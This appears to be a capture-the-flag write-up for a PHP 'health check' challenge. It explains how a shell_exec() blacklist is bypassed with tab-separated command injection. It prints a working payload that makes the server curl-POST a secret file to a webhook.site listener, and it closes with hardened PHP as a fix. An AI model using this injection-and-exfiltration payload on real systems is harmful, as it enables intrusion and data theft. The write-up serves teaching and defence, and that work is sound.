# Healthcheck

We were given a suspiciously wholesome-looking page at:

<http://104.214.185.119/index.php>

<figure><img src="https://3060579764-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy0V3IWOg11I6nY8wI18S%2Fuploads%2FhfFRCX3J1HuqYMcuenxg%2Fimage.png?alt=media&#x26;token=d852f3b0-87f2-4242-9d5b-bc026e798eec" alt=""><figcaption></figcaption></figure>

It's titled *"Health Check Your Webpage"*, but deep down, we all knew this wasn't about HTTP wellness. Our job? Dig up something the dev left behind: their “hopes and dreams” (literally; the page says *"**I left my hopes\_and\_dreams** on the server."*).

So, we open the given source code and what do we find? This:

<figure><img src="https://3060579764-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy0V3IWOg11I6nY8wI18S%2Fuploads%2F7op5OzTO0qnNp8W1mkS4%2Fimage.png?alt=media&#x26;token=b362af51-ea75-47cb-8631-9a6502994b60" alt=""><figcaption></figcaption></figure>

Command injection vibes, especially since **shell\_exec()** is used. But wait, there's a **blacklist**:

<figure><img src="https://3060579764-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy0V3IWOg11I6nY8wI18S%2Fuploads%2F4kggYyExXoutsbdFQ7cp%2Fimage.png?alt=media&#x26;token=78d77a32-cb2d-41e7-a383-9a084f39574e" alt=""><figcaption></figcaption></figure>

No <mark style="color:blue;">`;`</mark>, <mark style="color:blue;">`&`</mark>, <mark style="color:blue;">`|`</mark>, or even <mark style="color:blue;">`$`</mark>. Brutal. Like trying to eat soup with a fork.

At first, we tried every command injection trick in the book:

- `http://127.0.0.1/hopes_and_dreams`
- `http://104.214.185.119/index.php/hopes_and_dreams`
- `http://example.com http://127.0.0.1/hopes_and_dreams -o /var/www/html/hopes_and_dreams`

<figure><img src="https://3060579764-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy0V3IWOg11I6nY8wI18S%2Fuploads%2FsU7FB93BSIBIFLhor4R7%2Fimage.png?alt=media&#x26;token=fd550ecb-edf8-47b8-8c05-e53143cecfaa" alt=""><figcaption></figcaption></figure>

But… nothing. It only gives back HTTP status codes like `200` or `301`. No body content. No error output. Just silence. Hmmm.

That’s because the output of curl was redirected to `/dev/null`:

<figure><img src="https://3060579764-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy0V3IWOg11I6nY8wI18S%2Fuploads%2FFvjET5z8Hsfr4724GzJK%2Fimage.png?alt=media&#x26;token=43eac8c2-abf9-4c4c-abc1-afe7f9b41964" alt=""><figcaption></figcaption></figure>

So the whole response body is thrown away.

We stopped thinking like a hacker. We started thinking like a hacker with a network. If we can't *see* the flag directly… why not *send* it to ourselves?

We used [**Webhook.site**](https://webhook.site/), a free service that gives us a unique endpoint to collect requests.

Then, we crafted this payload:

```
http://127.0.0.1/;	curl	-X	POST	-d	@hopes_and_dreams https://webhook.site/<our-unique-id>
```

We hit submit, went back to webhook.site, and there it was, sitting like a jewel in the logs:

<figure><img src="https://3060579764-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fy0V3IWOg11I6nY8wI18S%2Fuploads%2F2R38NI8ZFiEtEOUt0t9V%2Fimage.png?alt=media&#x26;token=e7bc875c-9d0d-4a9b-9b0c-0a2ed4b6f102" alt=""><figcaption></figcaption></figure>

That `-o /dev/null` part discards the body. So even if `cat /flag` or `curl /flag` worked, we’d never see the output in the response.

But what if we told the vulnerable server to make its own HTTP request to somewhere we can monitor?

That’s where **webhook.site** comes in. It's our external listener. We use it as a “data exfiltration endpoint”.

By telling the target to:

```
curl -X POST -d @hopes_and_dreams https://webhook.site/...
```

…it reads the contents of the `hopes_and_dreams` file and sends it as the body of a POST request to our webhook. No output is shown in the browser, but we don't need it. The data is sent *to us*.

**Flag:** <mark style="color:blue;">`umcs{n1c3_j0b_ste4l1ng_myh0p3_4nd_dr3ams}`</mark>
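As an added example (not the challenge's PHP, which is only shown in the screenshots above), this is how the health check could have been written so that no shell string is ever built from user input: validate the URL against an allowlist and call libcurl directly. The function names and option choices are assumptions of this example.

```php
<?php
// Added example, not the challenge's code (which is only shown in screenshots).
// The challenge built a `curl ... -o /dev/null` command string with shell_exec()
// and filtered a few metacharacters; unlisted separators such as tabs still
// reached the shell. The fix is to stop building shell strings at all.

function healthcheck(string $url): ?int
{
    // Reject anything that is not a syntactically valid absolute URL.
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $parts = parse_url($url);

    // Allowlist the scheme: no file://, gopher://, dict:// and friends.
    if (!in_array(strtolower($parts['scheme'] ?? ''), ['http', 'https'], true)) {
        return null;
    }

    // Keep the check pointed at public hosts, not loopback or RFC 1918 space.
    $ip = gethostbyname($parts['host'] ?? '');
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
        return null;
    }

    // libcurl through the PHP extension: no shell, so metacharacters are inert.
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_NOBODY         => true,   // we only want the status code
        CURLOPT_RETURNTRANSFER => true,   // replaces `-o /dev/null`
        CURLOPT_FOLLOWLOCATION => false,  // no redirects into internal hosts
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_TIMEOUT        => 5,
    ]);
    curl_exec($ch);
    $status = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    return $status ?: null;
}

// If a shell is truly unavoidable, quote the whole value instead of
// blacklisting characters: escapeshellarg() single-quotes it, so `;`, tabs,
// backticks and `$` are all literal. Run it only after the checks above.
function healthcheckViaShell(string $url): string
{
    return (string) shell_exec('curl -s -o /dev/null -w "%{http_code}" ' . escapeshellarg($url));
}
```

The resolve-then-connect check still leaves a DNS rebinding window between `gethostbyname()` and curl's own lookup; pin the vetted address with `CURLOPT_RESOLVE` if internal hosts are a concern.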
